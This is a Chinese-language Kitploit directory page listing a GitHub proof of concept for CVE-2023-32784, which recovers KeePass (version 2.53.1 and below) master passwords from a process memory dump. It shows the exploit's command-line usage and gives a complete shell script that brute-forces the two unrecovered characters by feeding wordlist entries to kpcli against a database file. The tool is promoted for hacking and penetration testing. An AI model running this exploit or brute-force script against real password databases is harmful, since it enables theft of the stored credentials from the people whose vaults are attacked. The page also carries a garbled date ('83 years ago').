Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-32784 — 检索 KeePass 数据库(版本 <= 2.53.1)的主密码 | Kitploit
工具/GitHubGitHub/dawnl3ss/cve-2023-32784
密码破解内存取证漏洞分析漏洞利用取证分析
GitHubdawnl3ss/cve-2023-32784

CVE-2023-32784

检索 KeePass 数据库(版本 <= 2.53.1)的主密码

查看仓库
83年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

keepass-dump-masterkey

用法

python3 poc.py <PathToDmp>

预览

提醒一下,转储中找不到第一个字符,而对于第二个字符,脚本只会给出几种可能性。无论如何,我们建议您使用下面的脚本对2个字符进行暴力破解:

root@kitploit:~
#!/bin/sh
# Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)
while read i
do
    echo "Using password: \"$i\""
    echo "$i" | kpcli --kdb=$1 && exit 0
done < $2

此脚本在物理机上运行良好,但在虚拟机上似乎不稳定

顺便说一句:本项目中的 python 脚本遵循以下项目的读取方式:https://github.com/vdohney/keepass-password-dumper

下载工具